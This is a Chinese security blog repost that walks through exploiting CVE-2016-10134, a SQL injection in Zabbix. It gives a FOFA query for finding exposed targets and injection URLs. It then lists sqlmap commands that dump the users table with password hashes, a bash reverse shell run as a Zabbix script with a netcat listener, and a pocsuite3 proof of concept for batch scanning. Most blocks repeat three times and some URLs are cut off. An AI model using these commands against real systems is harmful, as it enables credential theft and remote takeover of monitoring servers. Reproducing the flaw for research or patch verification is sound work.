-CVE-2016-10134 zabbix sql注入

01148

本文转载于公众号:融云攻防实验室,原文地址:

漏洞复现-CVE-2016-10134 zabbix sql注入

0x01 阅读须知

资源来源于网络,安全小天地只是再次进行分享,使用请遵循本站的免责申明

0x02 漏洞描述

zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。zabbix能监视各种网络参数,保证服务器系统的安全运营;并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题。Zabbix的latest.php中的toggle_ids[]或jsrpc.php中的profieldx2参数存在sql注入,攻击者可通过sql注入获取管理员账户密码,进入后台,进行getshell操作。

图片[1]--CVE-2016-10134 zabbix sql注入-安全小天地

0x03 漏洞复现

漏洞影响:zabbix 2.0.x| 2.2.x| 2.4.x| 3.0.0-3.0.3

FOFA:app=”ZABBIX-监控系统”

1.输入payload爆出数据库用户名

http://x.x.x.x:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph
http://x.x.x.x:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph
http://x.x.x.x:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph
图片[2]--CVE-2016-10134 zabbix sql注入-安全小天地

2.使用sqlmap查库、查表、查列、查数据

查所有库:
python3 sqlmap.py -u \"http://x.x.x.x:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=*\" --dbs
查zabbix表:
python3 sqlmap.py -u \"http://x.x.x.x:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=*\" -D zabbix --tables
查users列:
python3 sqlmap.py -u \"http://x.x.x.x:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=*\" -D zabbix -T users --columns
查userid,name,passwd数据:
python3 sqlmap.py -u \"http://x.x.x.x:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=*\" -D zabbix -T users -C userid,name,passwd --dump
查所有库:
python3 sqlmap.py -u \"http://x.x.x.x:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=*\" --dbs
查zabbix表:
python3 sqlmap.py -u \"http://x.x.x.x:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=*\" -D zabbix --tables
查users列:
python3 sqlmap.py -u \"http://x.x.x.x:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=*\" -D zabbix -T users --columns
查userid,name,passwd数据:
python3 sqlmap.py -u \"http://x.x.x.x:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=*\" -D zabbix -T users -C userid,name,passwd --dump

查所有库:
python3 sqlmap.py -u \"http://x.x.x.x:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=*\" --dbs
查zabbix表:
python3 sqlmap.py -u \"http://x.x.x.x:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=*\" -D zabbix --tables
查users列:
python3 sqlmap.py -u \"http://x.x.x.x:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=*\" -D zabbix -T users --columns
查userid,name,passwd数据:
python3 sqlmap.py -u \"http://x.x.x.x:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=*\" -D zabbix -T users -C userid,name,passwd --dump
图片[3]--CVE-2016-10134 zabbix sql注入-安全小天地

3.使用账户名密码登录admin:zabbix

http://x.x.x.x:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&re
http://x.x.x.x:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&re
http://x.x.x.x:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&re
图片[2]--CVE-2016-10134 zabbix sql注入-安全小天地

4. nc监听7778端口

nc -lnvp 7778
nc -lnvp 7778
nc -lnvp 7778

5.Administration→Scripts→Create Script写一个反弹shell的脚本

bash -i >& /dev/tcp/IP/PORT 0>&1
bash -i >& /dev/tcp/IP/PORT 0>&1
bash -i >& /dev/tcp/IP/PORT 0>&1

6.Monitoring→Latest data→点击Zabbix server运行脚本,得到一个shell(注:需要在筛选栏host groups选择Zabbix servers才能看到1脚本)

图片[5]--CVE-2016-10134 zabbix sql注入-安全小天地

7.使用pocsuite3批量验证1.txt文件中的url是否存在该漏洞,显示一个成功一个失败。

pocsuite3下载地址:https://github.com/knownsec/pocsuite3

批量验证命令:
python3 cli.py -r pocs/ZABBIX-CVE-2016-10134.py -f 1.txt
POC:
# -*- coding:utf-8 -*-
from collections import OrderedDict
from urllib.parse import urljoin
import re
from pocsuite3.api import POCBase, Output, register_poc, logger, requests, OptDict, VUL_TYPE
from pocsuite3.api import REVERSE_PAYLOAD, POC_CATEGORY
class DemoPOC(POCBase):#漏洞信息
    vulID = \'CVE-2016-10134\'
    version = \'zabbix 2.0.x| 2.2.x| 2.4.x| 3.0.0-3.0.3\'
    author = [\'ry\']
    vulDate = \'2022-05-06\'
    createDate = \'2022-05-06\'
    updateDate = \'2022-05-06\'
    references = [\'https://www.cnblogs.com/cute-puli/p/15659959.html\']
    name = \'zabbix SQL\'
    appPowerLink = \'CVE-2016-10134\'
    appName = \'zabbix SQL\'
    appVersion = \'2.X,3.X\'
    vulType = \'sql\'
    desc = \'\'\'
        zabbix sql注入
    \'\'\'
    samples = []
    install_requires = [\'\']
    def _verify(self):
        result = {}
        path = \"/jsrpc.php\"
        url = self.url + path
        #print(url)
        payload = \"?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0,md5(\'wwwq\')),0)\"
        #print(payload)
        try:
            resq = requests.get(url + payload)
            if resq and resq.status_code == 200 and \"afece6b64dc8eff8b9bd078a5f\" in resq.text:
                result[\'VerifyInfo\'] = {}
                result[\'VerifyInfo\'][\'URL\'] = url
                result[\'VerifyInfo\'][\'Name\'] = payload
        except Exception as e:
            return 
        return self.parse_output(result)
    def _attack(self):
        return self._verify()
    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail(\'target is not vulnerable\')
        return output
register_poc(DemoPOC)
批量验证命令:
python3 cli.py -r pocs/ZABBIX-CVE-2016-10134.py -f 1.txt

POC:
# -*- coding:utf-8 -*-

from collections import OrderedDict
from urllib.parse import urljoin
import re
from pocsuite3.api import POCBase, Output, register_poc, logger, requests, OptDict, VUL_TYPE
from pocsuite3.api import REVERSE_PAYLOAD, POC_CATEGORY


class DemoPOC(POCBase):#漏洞信息
    vulID = \'CVE-2016-10134\'
    version = \'zabbix 2.0.x| 2.2.x| 2.4.x| 3.0.0-3.0.3\'
    author = [\'ry\']
    vulDate = \'2022-05-06\'
    createDate = \'2022-05-06\'
    updateDate = \'2022-05-06\'
    references = [\'https://www.cnblogs.com/cute-puli/p/15659959.html\']
    name = \'zabbix SQL\'
    appPowerLink = \'CVE-2016-10134\'
    appName = \'zabbix SQL\'
    appVersion = \'2.X,3.X\'
    vulType = \'sql\'
    desc = \'\'\'
        zabbix sql注入
    \'\'\'
    samples = []
    install_requires = [\'\']

    def _verify(self):
        result = {}
        path = \"/jsrpc.php\"
        url = self.url + path
        #print(url)
        payload = \"?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0,md5(\'wwwq\')),0)\"
        #print(payload)
        try:
            resq = requests.get(url + payload)
            if resq and resq.status_code == 200 and \"afece6b64dc8eff8b9bd078a5f\" in resq.text:
                result[\'VerifyInfo\'] = {}
                result[\'VerifyInfo\'][\'URL\'] = url
                result[\'VerifyInfo\'][\'Name\'] = payload
        except Exception as e:
            return 
        return self.parse_output(result)

    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail(\'target is not vulnerable\')
        return output

register_poc(DemoPOC)
批量验证命令:
python3 cli.py -r pocs/ZABBIX-CVE-2016-10134.py -f 1.txt

POC:
# -*- coding:utf-8 -*-

from collections import OrderedDict
from urllib.parse import urljoin
import re
from pocsuite3.api import POCBase, Output, register_poc, logger, requests, OptDict, VUL_TYPE
from pocsuite3.api import REVERSE_PAYLOAD, POC_CATEGORY


class DemoPOC(POCBase):#漏洞信息
    vulID = \'CVE-2016-10134\'
    version = \'zabbix 2.0.x| 2.2.x| 2.4.x| 3.0.0-3.0.3\'
    author = [\'ry\']
    vulDate = \'2022-05-06\'
    createDate = \'2022-05-06\'
    updateDate = \'2022-05-06\'
    references = [\'https://www.cnblogs.com/cute-puli/p/15659959.html\']
    name = \'zabbix SQL\'
    appPowerLink = \'CVE-2016-10134\'
    appName = \'zabbix SQL\'
    appVersion = \'2.X,3.X\'
    vulType = \'sql\'
    desc = \'\'\'
        zabbix sql注入
    \'\'\'
    samples = []
    install_requires = [\'\']

    def _verify(self):
        result = {}
        path = \"/jsrpc.php\"
        url = self.url + path
        #print(url)
        payload = \"?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0,md5(\'wwwq\')),0)\"
        #print(payload)
        try:
            resq = requests.get(url + payload)
            if resq and resq.status_code == 200 and \"afece6b64dc8eff8b9bd078a5f\" in resq.text:
                result[\'VerifyInfo\'] = {}
                result[\'VerifyInfo\'][\'URL\'] = url
                result[\'VerifyInfo\'][\'Name\'] = payload
        except Exception as e:
            return 
        return self.parse_output(result)

    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail(\'target is not vulnerable\')
        return output

register_poc(DemoPOC)
------本文已结束,感谢您的阅读------
THE END
技术教程
# 漏洞复现# cve# zabbix# sql注入# sql# CVE-2016-10134
喜欢就支持一下吧
点赞8 分享
If you don’t try, you’ll never know. So try.
如果你不去试,你永远也不知道结果,所以去试试吧
C语言教程的头像,网络安全爱好者中心-神域博客网
相关推荐
评论 抢沙发

请登录后发表评论

    暂无评论内容

文章目录